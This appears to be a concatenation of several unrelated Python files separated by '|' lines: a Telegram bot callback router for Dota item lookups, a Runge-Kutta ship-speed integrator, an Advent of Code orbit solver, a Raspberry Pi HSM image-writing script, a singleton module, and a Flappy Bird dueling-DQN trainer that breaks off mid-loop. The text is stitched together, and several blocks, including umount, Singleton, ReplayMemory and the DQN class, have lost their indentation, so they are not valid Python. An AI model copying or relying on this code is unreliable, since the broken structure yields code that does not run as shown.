    _DB_LOOKUPS[_name] = ('item_inf', nazad3)
for _name in ("Keen Optic", "Ironwood Tree", "Ocean Hert"):
    _DB_LOOKUPS[_name] = ('item_inf2', nazad4)
for _name in ("Ring of Aquila", "Imp Claw", "Nether Shawl"):
    _DB_LOOKUPS[_name] = ('item_inf2', nazad5)
for _name in ("Magic Wand", "Buckler", "Veil of Discord"):
    _DB_LOOKUPS[_name] = ('item_inf3', nazad20)
_DB_LOOKUPS['роли героев'] = ('item_spr', nazadspr)


@dp.callback_query_handler()
async def test_test(call):
    """Route every inline-keyboard callback.

    Two kinds of callbacks, dispatched by table instead of the previous
    400-line elif chain (all callback-data keys are unique, so the table
    lookup matches the old first-hit-wins chain exactly):

    * menu navigation — answer with a prompt and the next keyboard;
    * info lookups — clear the current keyboard, fetch the hero/item text
      from the Database, and answer with the matching "back" keyboard.

    Unknown callback data is ignored, as before.
    """
    data = call.data
    if data in _MENU:
        text, markup = _MENU[data]
        await call.message.answer(text=text, reply_markup=markup)
    elif data in _DB_LOOKUPS:
        method_name, back_markup = _DB_LOOKUPS[data]
        await call.message.edit_reply_markup()
        info = getattr(Database(), method_name)(data)
        await call.message.answer(info, reply_markup=back_markup)
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
matplotlib.rcParams['font.family'] = 'STSong'
fig = plt.figure(figsize=(12, 8), dpi=100)
# Integration parameters: N steps of size h.
N = 100000
h = 0.1
# Physical constants — presumably ship-resistance parameters (m: mass,
# X_P: propeller thrust, d: draft, C_b: block coefficient, B: beam,
# L: length, S: wetted surface, p: water density, v: kinematic viscosity,
# m_x: added mass); TODO confirm units/meaning with the author.
m = 1.82781*10**8
X_P = 3.3*10**6
d = 16.5
C_b = 0.8580
B = 45.0
L = 280.0
S = 19556.1
p = 1.02473*10**3
v = 1.05372*10**(-6)
m_x = 4.799*10**7
# Accumulated solution: X holds time points, Y the integrated values.
X, Y = [0], [0]
def f(x,y):
    """Right-hand side of the ODE: acceleration for speed y.

    The friction coefficient has the ITTC-1957 correlation-line form
    0.075/(log10(Re)-2)^2; the result is (hull force + thrust) divided by
    (mass + added mass). Note x is unused — the equation is autonomous.
    """
    # Reynolds number for speed y over length L.
    R = y * L / v
    t = np.log10(R)
    C_f = 0.075 / ((t - 2)**2)
    # Total resistance coefficient = friction + fixed allowances.
    C_t = C_f + 0.9*10**(-3) +4*10**(-4)
    # Hull force opposes motion (negative), proportional to y^2.
    X_H = -1/2*p*y*y*S*C_t
    return (X_H+X_P)/(m+m_x)
#
# def f(x, y):
# return -x * y ** 2
y_n = 2
# Classic fourth-order Runge-Kutta integration of y' = f(x, y).
for i in range(N):
    x_n = i * h
    k_1 = f(x_n, y_n)
    # Bug fix: the k_2 stage previously used y_n + 0.5*h*h*k_1 (an extra
    # factor of h); the RK4 scheme requires y_n + 0.5*h*k_1 here, matching
    # the k_3 stage below.
    k_2 = f(x_n + 0.5 * h, y_n + 0.5 * h * k_1)
    k_3 = f(x_n + 0.5 * h, y_n + 0.5 * h * k_2)
    k_4 = f(x_n + h, y_n + h * k_3)
    y_n += 1 / 6 * h * (k_1 + 2 * k_2 + 2 * k_3 + k_4)
    X.append(x_n + h)
    Y.append(y_n)
plt.plot(X, Y, 'r:')
print(Y)
# Dump the finite prefix of the solution as comma-separated values.
# Fixes two issues: the handle was named `f`, shadowing the ODE function
# above, and it was never closed — `with` closes (and flushes) it.
with open('log.txt', 'w') as log_file:
    for value in Y:
        if value == float('inf'):
            break
        log_file.write(str(value))
        log_file.write(',')
        print(value)
plt.show()
|
import networkx as nx
from collections import defaultdict
# Input: one orbit per line in the form "A)B" (B directly orbits A).
file = "Day6/inputnaomi.txt"
with open(file,'r') as f:
    data = f.readlines()
# Redundant: the with-block already closed the file; kept as in original.
f.close()
G = nx.Graph()
# Add an edge A-B for each orbit "A)B". NOTE(review): despite the original
# comment, nx.Graph() stores these as UNDIRECTED edges.
for row in data:
    src,dst=row.strip().split(')')
    G.add_edge(src,dst)
def BFS(startnode, distance, visited_nodes, distances):
    """Recursive walk from startnode recording each node's hop distance.

    (Named BFS but implemented as a recursive depth-first walk; on a tree
    both give the unique path length.) Fills `distances` with the number of
    edges from the original start node; the start node itself gets no entry.

    Bug fix: the start node is now marked visited before recursing. Since G
    is an undirected nx.Graph, the walk previously re-entered the start node
    from its first neighbor, gave it a spurious distance, and then assigned
    inflated distances to the start's remaining neighbors.
    """
    visited_nodes[startnode] = True
    distance += 1
    for n in G.neighbors(startnode):
        if visited_nodes[n]:
            continue
        visited_nodes[n] = True
        distances[n] = distance
        BFS(n, distance, visited_nodes, distances)
# Part 1: total orbit count = sum of every node's depth below COM.
distances_from_origin={}
BFS("COM",0,defaultdict(lambda: False),distances_from_origin)
no_orbits=sum(distances_from_origin.values())
print("Part 1: "+str(no_orbits))
# Part 2: orbital transfers between YOU and SAN = path length minus the
# two edges connecting YOU and SAN to their own orbit centers.
distances_from_you={}
BFS("YOU",0,defaultdict(lambda: False),distances_from_you)
print("Part 2: "+str(distances_from_you["SAN"]-2))
|
# pihsm: Turn your Raspberry Pi into a Hardware Security Module
# Copyright (C) 2017 System76, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
from os import path
import time
import tempfile
import shutil
import subprocess
from .common import atomic_write
log = logging.getLogger(__name__)
CHUNK_SIZE = 8 * 1024 * 1024
RC_LOCAL_1 = b"""#!/bin/sh -ex
# Written by PiHSM:
/etc/rc.local.2
mv /etc/rc.local.2 /etc/rc.local
sleep 2
ufw enable
sleep 10
apt-get purge -y openssh-server
add-apt-repository -ys ppa:jderose/pihsm
apt-get update
apt-get install -y pihsm-server
echo "HRNGDEVICE=/dev/hwrng" > /etc/default/rng-tools
# pollinate snapd mdadm
apt-get purge -y cloud-init cloud-guest-utils
deluser ubuntu --remove-home
systemctl disable apt-daily-upgrade.timer
systemctl disable apt-daily.timer
systemctl disable getty@.service
systemctl mask getty@.service
systemctl disable snapd.socket
systemctl disable snapd.service
systemctl disable snapd.refresh.timer
systemctl disable snapd.snap-repair.timer
systemctl disable lxd.socket
systemctl disable lxd-containers.service
systemctl disable lxcfs.service
systemctl disable ureadahead.service
systemctl disable lvm2-lvmetad.service
systemctl disable lvm2-lvmetad.socket
systemctl disable open-iscsi.service
systemctl disable iscsid.service
systemctl mask getty-static.service
systemctl mask systemd-rfkill.service
systemctl mask systemd-rfkill.socket
systemctl disable systemd-networkd.service
systemctl mask systemd-networkd.service
systemctl disable systemd-resolved.service
systemctl mask systemd-resolved.service
systemctl mask acpid.path
systemctl mask acpid.service
systemctl mask acpid.socket
sleep 3
pihsm-display-enable
sync
sleep 3
shutdown -h now
"""
RC_LOCAL_2 = b"""#!/bin/sh -ex
# Written by PiHSM:
sleep 1
echo ds1307 0x68 > /sys/class/i2c-adapter/i2c-1/new_device
sleep 5
hwclock -s --debug
"""
CONFIG_APPEND = b"""
# Added by PiHSM:
dtoverlay=i2c-rtc,ds1307
arm_freq=600
"""
JOURNALD_CONF_APPEND = b"""
# Added by PiHSM:
Storage=persistent
ForwardToSyslog=no
ForwardToWall=no
ForwardToConsole=yes
"""
RESOLVED_CONF_APPEND = b"""
# Added by PiHSM:
LLMNR=no
MulticastDNS=no
"""
def update_cmdline(basedir):
    """Strip every ``console=`` entry from the image's kernel cmdline.txt.

    Idempotent: if nothing changes, the file is left untouched. Writes go
    through atomic_write.

    :param basedir: root of the mounted/unpacked image
    """
    filename = path.join(basedir, 'boot', 'firmware', 'cmdline.txt')
    # Close the handle deterministically (was an unclosed open(...).read()).
    with open(filename, 'rb', 0) as fp:
        old = fp.read()
    parts = []
    for p in old.split():
        if p.startswith(b'console='):
            log.info('Removing from cmdline: %r', p)
        else:
            parts.append(p)
    new = b' '.join(parts) + b'\n'
    if new == old:
        log.info('Already modified: %r', filename)
    else:
        atomic_write(0o644, new, filename)
def _atomic_append(filename, append):
    """Append `append` (bytes) to filename via atomic_write.

    Idempotent: when the file already ends with `append`, it is left alone.
    """
    # Close the handle deterministically (was an unclosed open(...).read()).
    with open(filename, 'rb', 0) as fp:
        current = fp.read()
    if current.endswith(append):
        log.info('Already modified: %r', filename)
    else:
        atomic_write(0o644, current + append, filename)
def update_config(basedir):
    """Append the PiHSM overlay/clock settings to boot/firmware/config.txt."""
    filename = path.join(basedir, 'boot', 'firmware', 'config.txt')
    _atomic_append(filename, CONFIG_APPEND)

def update_journald_conf(basedir):
    """Append persistent-journal settings to etc/systemd/journald.conf."""
    filename = path.join(basedir, 'etc', 'systemd', 'journald.conf')
    _atomic_append(filename, JOURNALD_CONF_APPEND)

def update_resolved_conf(basedir):
    """Append LLMNR/mDNS-disabling settings to etc/systemd/resolved.conf."""
    filename = path.join(basedir, 'etc', 'systemd', 'resolved.conf')
    _atomic_append(filename, RESOLVED_CONF_APPEND)
def _mask_service(basedir, service):
    """Mask *service* by symlinking its unit file to /dev/null."""
    target = '/dev/null'
    link = path.join(basedir, 'etc', 'systemd', 'system', service)
    # Refuse to clobber an existing unit file or symlink.
    assert not path.exists(link)
    os.symlink(target, link)
    log.info('Symlinked %r --> %r', link, target)
def _disable_service(basedir, wanted_by, service):
    """Disable *service* by removing its symlink from the *wanted_by* target dir."""
    filename = path.join(basedir, 'etc', 'systemd', 'system', wanted_by, service)
    # Only ever remove a symlink, never a real unit file.
    assert path.islink(filename)
    os.remove(filename)
    log.info('Removed symlink %r', filename)
def disable_services(basedir):
    """Disable, then mask, the fixed set of unwanted services in the image."""
    for wanted_by, service in (
        ('default.target.wants', 'ureadahead.service'),
        ('multi-user.target.wants', 'unattended-upgrades.service'),
    ):
        _disable_service(basedir, wanted_by, service)
        _mask_service(basedir, service)
def configure_image(basedir):
    """Apply all PiHSM customisations to a mounted image tree at *basedir*."""
    update_cmdline(basedir)
    update_config(basedir)
    update_journald_conf(basedir)
    update_resolved_conf(basedir)
    # Seed the kernel RNG pool so first boot has entropy available.
    atomic_write(0o600, os.urandom(512),
        path.join(basedir, 'var', 'lib', 'systemd', 'random-seed')
    )
    # Install the two boot scripts (both must be executable).
    atomic_write(0o755, RC_LOCAL_1,
        path.join(basedir, 'etc', 'rc.local')
    )
    atomic_write(0o755, RC_LOCAL_2,
        path.join(basedir, 'etc', 'rc.local.2')
    )
    disable_services(basedir)
def open_image(filename):
    """Spawn xzcat to stream-decompress *filename*; caller reads p.stdout."""
    cmd = ['xzcat', filename]
    return subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE)
def iter_image(filename, size=CHUNK_SIZE):
    """Yield decompressed chunks of the xz image at *filename*.

    Raises AssertionError if xzcat exits non-zero after a clean read.
    """
    p = open_image(filename)
    log.info('Image: %r', filename)
    try:
        while True:
            chunk = p.stdout.read(size)
            if not chunk:
                break
            yield chunk
    except BaseException:
        # BUGFIX: the original bare `except:` swallowed the error (and
        # GeneratorExit) without re-raising; terminate xzcat, reap it,
        # and propagate the original exception.
        p.terminate()
        p.wait()
        raise
    p.wait()
    assert p.returncode == 0
def sync_opener(path, flags):
    """Opener for open() adding O_SYNC (write-through) and O_NOFOLLOW."""
    mode = flags | os.O_SYNC | os.O_NOFOLLOW
    return os.open(path, mode)
def umount(target):
try:
subprocess.check_call(['umount', target])
log.info('Unmounted %r', target)
except subprocess.CalledProcessError:
log.debug('Not mounted: %r', target)
def open_mmc(dev):
    """Open the raw block device for unbuffered, synchronous writing."""
    # Have the kernel re-read the partition table before we start writing.
    subprocess.check_call(['blockdev', '--rereadpt', dev])
    return open(dev, 'wb', 0, opener=sync_opener)
def rereadpt(dev):
    """Flush pending writes, then re-read *dev*'s partition table."""
    os.sync()
    time.sleep(1)  # give the device a moment to settle
    subprocess.check_call(['blockdev', '--rereadpt', dev])
def write_image_to_mmc(img, dev):
    """Stream the decompressed image *img* onto device *dev*.

    Returns the total number of bytes written.
    """
    mmc = open_mmc(dev)
    return sum(mmc.write(chunk) for chunk in iter_image(img))
def mmc_part(dev, n):
    """Return the device node of partition *n* of *dev* (e.g. /dev/mmcblk0p2)."""
    assert type(n) is int and n > 0
    suffix = 'p{:d}'.format(n)
    return dev + suffix
class PiImager:
    """Write the compressed PiHSM image to an SD card and configure it."""

    def __init__(self, img, dev):
        # img: path to the xz-compressed image file
        # dev: raw block device, e.g. /dev/mmcblk0
        self.img = img
        self.dev = dev
        self.p1 = mmc_part(dev, 1)  # boot/firmware partition
        self.p2 = mmc_part(dev, 2)  # root partition

    def umount_all(self):
        """Best-effort unmount of both partitions."""
        umount(self.p1)
        umount(self.p2)

    def write_image(self):
        """Stream the image onto the raw device; return bytes written."""
        self.umount_all()
        rereadpt(self.dev)
        try:
            total = write_image_to_mmc(self.img, self.dev)
            os.sync()
            time.sleep(1)
            return total
        finally:
            # Re-read the partition table so the new layout is visible.
            rereadpt(self.dev)

    def configure(self):
        """Mount both partitions under a temp dir and run configure_image()."""
        tmp = tempfile.mkdtemp(prefix='pihsm.')
        try:
            log.info('Working directory: %r', tmp)
            root = path.join(tmp, 'root')
            os.mkdir(root)
            # boot/firmware lives inside the root tree once p2 is mounted.
            firmware = path.join(root, 'boot', 'firmware')
            subprocess.check_call(['mount', self.p2, root])
            subprocess.check_call(['mount', self.p1, firmware])
            configure_image(root)
            os.sync()
        finally:
            self.umount_all()
            shutil.rmtree(tmp)
            log.info('Removed directory %r', tmp)

    def run(self):
        """Full workflow: write the image, then configure it in place."""
        self.write_image()
        self.configure()
|
"""
使用模块实现单例模式
"""
class Singleton(object):
def foo(self):
pass
singleton = Singleton()
|
import pygame
from pygame.locals import *
from itertools import cycle
import random
import numpy as np
import cv2
import sys
import os
os.environ['SDL_VIDEODRIVER'] = 'dummy' # Run Headless Pygame environment
"""## Load Game Resources"""
def getHitmask(image):
    """Build a 2-D boolean alpha mask for *image*.

    Entry [x][y] is True when the pixel at (x, y) has non-zero alpha,
    i.e. the pixel is visible and can take part in collisions.
    """
    width, height = image.get_width(), image.get_height()
    return [[bool(image.get_at((x, y))[3]) for y in range(height)]
            for x in range(width)]
def load(BASE_PATH = './'):
    """Load all sprite images and precompute their collision hitmasks.

    Returns (IMAGES, HITMASKS): dicts keyed by sprite role
    ('numbers', 'base', 'background', 'player', 'pipe').
    """
    # path of player with different states
    PLAYER_PATH = (
        BASE_PATH + 'assets/sprites/redbird-upflap.png',
        BASE_PATH + 'assets/sprites/redbird-midflap.png',
        BASE_PATH + 'assets/sprites/redbird-downflap.png'
    )
    # path of background
    BACKGROUND_PATH = BASE_PATH + 'assets/sprites/background-black.png'
    # path of pipe
    PIPE_PATH = BASE_PATH + 'assets/sprites/pipe-green.png'
    IMAGES, HITMASKS = {}, {}
    # numbers sprites for score display
    IMAGES['numbers'] = (
        pygame.image.load(BASE_PATH + 'assets/sprites/0.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/1.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/2.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/3.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/4.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/5.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/6.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/7.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/8.png').convert_alpha(),
        pygame.image.load(BASE_PATH + 'assets/sprites/9.png').convert_alpha()
    )
    # base (ground) sprite
    IMAGES['base'] = pygame.image.load(BASE_PATH + 'assets/sprites/base.png').convert_alpha()
    # background sprite (a single fixed image, despite the original comment)
    IMAGES['background'] = pygame.image.load(BACKGROUND_PATH).convert()
    # player animation frames (up / mid / down flap)
    IMAGES['player'] = (
        pygame.image.load(PLAYER_PATH[0]).convert_alpha(),
        pygame.image.load(PLAYER_PATH[1]).convert_alpha(),
        pygame.image.load(PLAYER_PATH[2]).convert_alpha(),
    )
    # pipe sprites: rotated copy for the upper pipe, original for the lower
    IMAGES['pipe'] = (
        pygame.transform.rotate(
            pygame.image.load(PIPE_PATH).convert_alpha(), 180),
        pygame.image.load(PIPE_PATH).convert_alpha(),
    )
    # hitmask for pipes
    HITMASKS['pipe'] = (
        getHitmask(IMAGES['pipe'][0]),
        getHitmask(IMAGES['pipe'][1]),
    )
    # hitmask for player
    HITMASKS['player'] = (
        getHitmask(IMAGES['player'][0]),
        getHitmask(IMAGES['player'][1]),
        getHitmask(IMAGES['player'][2]),
    )
    return IMAGES, HITMASKS
"""## Game Parameters Setting"""
FPS = 30
SCREENWIDTH = 288
SCREENHEIGHT = 512
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Flappy Bird')
IMAGES, HITMASKS = load()
PIPEGAPSIZE = 100 # gap between upper and lower part of pipe
BASEY = SCREENHEIGHT * 0.79
PLAYER_WIDTH = IMAGES['player'][0].get_width()
PLAYER_HEIGHT = IMAGES['player'][0].get_height()
PIPE_WIDTH = IMAGES['pipe'][0].get_width()
PIPE_HEIGHT = IMAGES['pipe'][0].get_height()
BACKGROUND_WIDTH = IMAGES['background'].get_width()
PLAYER_INDEX_GEN = cycle([0, 1, 2, 1])
class GameState:
    """Headless Flappy Bird environment advanced one frame at a time."""

    def __init__(self):
        # score / animation frame index / frame counter
        self.score = self.playerIndex = self.loopIter = 0
        self.playerx = int(SCREENWIDTH * 0.2)
        self.playery = int((SCREENHEIGHT - PLAYER_HEIGHT) / 2)
        self.basex = 0
        self.baseShift = IMAGES['base'].get_width() - BACKGROUND_WIDTH
        newPipe1 = getRandomPipe()
        newPipe2 = getRandomPipe()
        self.upperPipes = [
            {'x': SCREENWIDTH, 'y': newPipe1[0]['y']},
            {'x': SCREENWIDTH + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
        ]
        self.lowerPipes = [
            {'x': SCREENWIDTH, 'y': newPipe1[1]['y']},
            {'x': SCREENWIDTH + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
        ]
        # player velocity, max velocity, downward acceleration, acceleration on flap
        self.pipeVelX = -4
        self.playerVelY = 0  # player's velocity along Y, default same as playerFlapped
        self.playerMaxVelY = 10  # max vel along Y, max descend speed
        self.playerMinVelY = -8  # min vel along Y, max ascend speed
        self.playerAccY = 1  # players downward acceleration (gravity)
        self.playerFlapAcc = -9  # players speed on flapping
        self.playerFlapped = False  # True when player flaps

    def frame_step(self, input_actions):
        """Advance one frame given a one-hot action array.

        input_actions[0] == 1 -> do nothing; input_actions[1] == 1 -> flap.
        Returns (image_data, reward, terminal) where image_data is the raw
        RGB frame from the pygame surface.
        """
        pygame.event.pump()
        reward = 0.1  # small living reward for surviving a frame
        terminal = False
        if sum(input_actions) != 1:
            raise ValueError('Multiple input actions!')
        # input_actions[0] == 1: do nothing
        # input_actions[1] == 1: flap the bird
        if input_actions[1] == 1:
            if self.playery > -2 * PLAYER_HEIGHT:
                self.playerVelY = self.playerFlapAcc
                self.playerFlapped = True
        # check for score: reward 1 when the player's midpoint passes a pipe's
        playerMidPos = self.playerx + PLAYER_WIDTH / 2
        for pipe in self.upperPipes:
            pipeMidPos = pipe['x'] + PIPE_WIDTH / 2
            if pipeMidPos <= playerMidPos < pipeMidPos + 4:
                self.score += 1
                reward = 1
        # playerIndex basex change (wing animation every 3 frames)
        if (self.loopIter + 1) % 3 == 0:
            self.playerIndex = next(PLAYER_INDEX_GEN)
        self.loopIter = (self.loopIter + 1) % 30
        self.basex = -((-self.basex + 100) % self.baseShift)
        # player's movement: apply gravity unless mid-flap
        if self.playerVelY < self.playerMaxVelY and not self.playerFlapped:
            self.playerVelY += self.playerAccY
        if self.playerFlapped:
            self.playerFlapped = False
        self.playery += min(self.playerVelY, BASEY - self.playery - PLAYER_HEIGHT)
        if self.playery < 0:
            self.playery = 0
        # move pipes to left
        for uPipe, lPipe in zip(self.upperPipes, self.lowerPipes):
            uPipe['x'] += self.pipeVelX
            lPipe['x'] += self.pipeVelX
        # add new pipe when first pipe is about to touch left of screen
        if 0 < self.upperPipes[0]['x'] < 5:
            newPipe = getRandomPipe()
            self.upperPipes.append(newPipe[0])
            self.lowerPipes.append(newPipe[1])
        # remove first pipe if its out of the screen
        if self.upperPipes[0]['x'] < -PIPE_WIDTH:
            self.upperPipes.pop(0)
            self.lowerPipes.pop(0)
        # check if crash here
        isCrash= checkCrash({'x': self.playerx, 'y': self.playery,
                             'index': self.playerIndex},
                            self.upperPipes, self.lowerPipes)
        if isCrash:
            terminal = True
            #self.__init__()
            reward = -1
        # draw sprites
        SCREEN.blit(IMAGES['background'], (0,0))
        for uPipe, lPipe in zip(self.upperPipes, self.lowerPipes):
            SCREEN.blit(IMAGES['pipe'][0], (uPipe['x'], uPipe['y']))
            SCREEN.blit(IMAGES['pipe'][1], (lPipe['x'], lPipe['y']))
        SCREEN.blit(IMAGES['base'], (self.basex, BASEY))
        # print score so player overlaps the score
        # showScore(self.score)
        SCREEN.blit(IMAGES['player'][self.playerIndex],
                    (self.playerx, self.playery))
        image_data = pygame.surfarray.array3d(pygame.display.get_surface())
        pygame.display.update()
        FPSCLOCK.tick(FPS)
        return image_data, reward, terminal
def getRandomPipe():
    """Return a new [upper, lower] pipe pair just off the right screen edge."""
    # y of gap between upper and lower pipe, offset into the playfield
    gapYs = [20, 30, 40, 50, 60, 70, 80, 90]
    gapY = gapYs[random.randint(0, len(gapYs) - 1)] + int(BASEY * 0.2)
    pipeX = SCREENWIDTH + 10
    upper = {'x': pipeX, 'y': gapY - PIPE_HEIGHT}
    lower = {'x': pipeX, 'y': gapY + PIPEGAPSIZE}
    return [upper, lower]
def checkCrash(player, upperPipes, lowerPipes):
    """Return True when the player hits the ground or any pipe."""
    pi = player['index']
    player['w'] = IMAGES['player'][0].get_width()
    player['h'] = IMAGES['player'][0].get_height()
    # Ground collision.
    if player['y'] + player['h'] >= BASEY - 1:
        return True
    playerRect = pygame.Rect(player['x'], player['y'],
                             player['w'], player['h'])
    # Hitmasks are the same for every pipe; look them up once.
    pHitMask = HITMASKS['player'][pi]
    uHitmask = HITMASKS['pipe'][0]
    lHitmask = HITMASKS['pipe'][1]
    for uPipe, lPipe in zip(upperPipes, lowerPipes):
        uPipeRect = pygame.Rect(uPipe['x'], uPipe['y'], PIPE_WIDTH, PIPE_HEIGHT)
        lPipeRect = pygame.Rect(lPipe['x'], lPipe['y'], PIPE_WIDTH, PIPE_HEIGHT)
        if pixelCollision(playerRect, uPipeRect, pHitMask, uHitmask):
            return True
        if pixelCollision(playerRect, lPipeRect, pHitMask, lHitmask):
            return True
    return False
def pixelCollision(rect1, rect2, hitmask1, hitmask2):
    """True when the two hitmasks overlap inside the rects' intersection."""
    rect = rect1.clip(rect2)
    if rect.width == 0 or rect.height == 0:
        return False
    # Offsets of the intersection within each hitmask.
    x1, y1 = rect.x - rect1.x, rect.y - rect1.y
    x2, y2 = rect.x - rect2.x, rect.y - rect2.y
    return any(hitmask1[x1 + x][y1 + y] and hitmask2[x2 + x][y2 + y]
               for x in range(rect.width)
               for y in range(rect.height))
"""# DQN Model"""
import torch
import torch.nn.functional as F
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def weights_init(layer):
    """Initialize Conv2d/Linear layers: N(0, 0.01) weights, constant 0.01 bias."""
    if not isinstance(layer, (torch.nn.Conv2d, torch.nn.Linear)):
        return
    torch.nn.init.normal_(layer.weight, mean=0., std=0.01)
    layer.bias.data.fill_(0.01)
class DQN_net(torch.nn.Module):
    """Dueling DQN: shared conv trunk, then separate state-value and
    action-advantage heads combined as Q = V + (A - mean(A))."""

    def __init__(self, in_channels = 4, out_actions = 2):
        super(DQN_net, self).__init__()
        # Convolutional trunk over the stacked input frames.
        self.conv1 = torch.nn.Conv2d(in_channels, 32, kernel_size = 8, stride = 4, padding = 2)
        self.conv2 = torch.nn.Conv2d(32, 64, kernel_size = 4, stride = 2, padding = 1)
        self.conv3 = torch.nn.Conv2d(64, 64, kernel_size = 3, stride = 1, padding = 1)
        # State Value Stream V(s)
        self.state_fc1 = torch.nn.Linear(6400, 512)
        self.state_fc2 = torch.nn.Linear(512, 1)
        # Action Advantage Stream A(s, a)
        self.action_fc1 = torch.nn.Linear(6400, 512)
        self.action_fc2 = torch.nn.Linear(512, out_actions)

    def forward(self, x):
        h = F.relu(self.conv1(x))
        h = F.relu(self.conv2(h))
        h = F.relu(self.conv3(h))
        h = h.reshape(-1, 6400)  # flatten conv features per sample
        value = self.state_fc2(F.relu(self.state_fc1(h)))       # (B, 1)
        advantage = self.action_fc2(F.relu(self.action_fc1(h))) # (B, actions)
        # Dueling combine; keepdim mean is equivalent to mean().reshape(B, 1).
        return value + (advantage - advantage.mean(dim=-1, keepdim=True))
"""# Replay Memory"""
class ReplayMemory:
def __init__(self, capacity):
self.capacity = capacity
self.container = []
def store(self, transition):
self.container.append(transition)
if len(self.container) > self.capacity:
del self.container[0]
def sample(self, batch_size):
return random.sample(self.container, batch_size)
def __len__(self):
return len(self.container)
"""# DQN Training Object"""
class DQN:
STACK_FRAMES = 4
def __init__(self, memory_capacity, batch_size, epsilon, explore, replace_period, alpha, gamma, num_frames, num_actions):
# Hyper-parameters
self.replace_period = replace_period
self.replace_counter = 1
self.epsilon = epsilon
self.epsilon_step = (epsilon - 0.0001) / explore
self.alpha = alpha
self.gamma = gamma
# NN, loss, optimizer
self.policy_net = DQN_net(num_frames, num_actions).to(device)
self.target_net = DQN_net(num_frames, num_actions).to(device)
self.policy_net.apply(weights_init)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.loss_function = torch.nn.MSELoss().to(device)
self.optimizer = torch.optim.Adam(self.policy_net.parameters(), lr = self.alpha)
# Replay Memory
self.replay_memory = ReplayMemory(memory_capacity)
self.batch_size = batch_size
def train(self):
# Sample transition
batch = self.replay_memory.sample(self.batch_size)
state, action, reward, state_, terminal = zip(*batch)
state = torch.tensor(state, dtype = torch.float32, requires_grad = True, device = device).reshape(self.batch_size, STACK_FRAMES, 80, 80)
action = torch.cat(action).to(device)
reward = torch.tensor(reward, dtype = torch.float32, requires_grad = False, device = device).reshape(self.batch_size, 1)
state_ = torch.tensor(state_, dtype = torch.float32, requires_grad = False, device = device).reshape(self.batch_size, STACK_FRAMES, 80, 80)
# (R + gamma * Q_) - Q
Q = self.policy_net(state).gather(dim = 1, index = action.view(-1, 1))
Q_ = self.target_net(state_).max(dim = 1)[0].view(-1, 1)
TD_target = torch.zeros(self.batch_size, 1).to(device)
# G = reward + self.gamma * Q_
for i in range(self.batch_size):
if not terminal[i]:
TD_target[i, 0] = reward[i, 0] + self.gamma * Q_[i, 0]
else:
TD_target[i, 0] = reward[i, 0]
# TD_target[terminal == False, 0] = G[terminal == False, 0]
# TD_target[terminal == True, 0] = reward[terminal == True, 0]
# loss
loss = self.loss_function(Q, TD_target)
# Optimize
self.optimizer.zero_grad()
loss.backward()
for param in self.policy_net.parameters():
param.grad.data.clamp_(-1, 1)
self.optimizer.step()
if self.replace_counter % self.replace_period == 0:
self.update_target_net()
self.replace_counter = 1
self.replace_counter += 1
def choose_action(self, obs, is_train = True):
if is_train:
if random.random() > self.epsilon:
return self.policy_net(obs).max(dim = 1)[1]
else:
return torch.tensor([random.randint(0, 1)], dtype = torch.int64, device = device)
else:
return self.policy_net(obs).max(dim = 1)[1]
def memory_store(self, transition):
self.replay_memory.store(transition)
def update_epsilon(self):
if self.epsilon > 0.0001:
self.epsilon -= self.epsilon_step
def update_target_net(self):
print('Update Target Net')
self.target_net.load_state_dict(self.policy_net.state_dict())
def load_model(self, PATH):
checkpoint = torch.load(PATH)
self.policy_net.load_state_dict(checkpoint['policy_net_state_dict'])
self.target_net.load_state_dict(checkpoint['target_net_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
self.epsilon = checkpoint['epsilon']
return checkpoint['episode'], checkpoint['iterations']
def save_model(self, episode, iterations):
torch.save({
'episode': episode,
'iterations': iterations,
'policy_net_state_dict': self.policy_net.state_dict(),
'target_net_state_dict': self.target_net.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'epsilon': self.epsilon
}, './new_dueling_checkpoint' + str(episode) + '.tar')
"""# DQN Process
"""
OBSERVE = 10000
EXPLORE = 3000000
EPISODE = 1000000
ACTION_IDLE = 1
SAVE_ITER = 5000
STACK_FRAMES = 4
LOAD = False
# Initialize Game
game = GameState()
episode = 1
iterations = 0
# Initialize Model
# Initialize Model
if not LOAD:
    dqn = DQN(memory_capacity = 50000,
              batch_size = 32,
              epsilon = 0.1,
              explore = EXPLORE,
              replace_period = 5000,
              alpha = 1e-6,
              gamma = 0.99,
              num_frames = STACK_FRAMES,
              num_actions = 2)
elif LOAD:
    # NOTE(review): this branch constructs an identical DQN to the one above;
    # kept as-is for behavioural fidelity.
    dqn = DQN(memory_capacity = 50000,
              batch_size = 32,
              epsilon = 0.1,
              explore = EXPLORE,
              replace_period = 5000,
              alpha = 1e-6,
              gamma = 0.99,
              num_frames = STACK_FRAMES,
              num_actions = 2)
    # Populate the replay memory by rolling out earlier checkpoints.
    # NOTE(review): indentation reconstructed from a flattened listing —
    # this populate phase is assumed to belong to the LOAD branch; confirm.
    ckpts = [3883, 3981, 4079, 4174, 4271, 4366, 4464, 4561, 4659, 4756]
    for ckpt in ckpts:
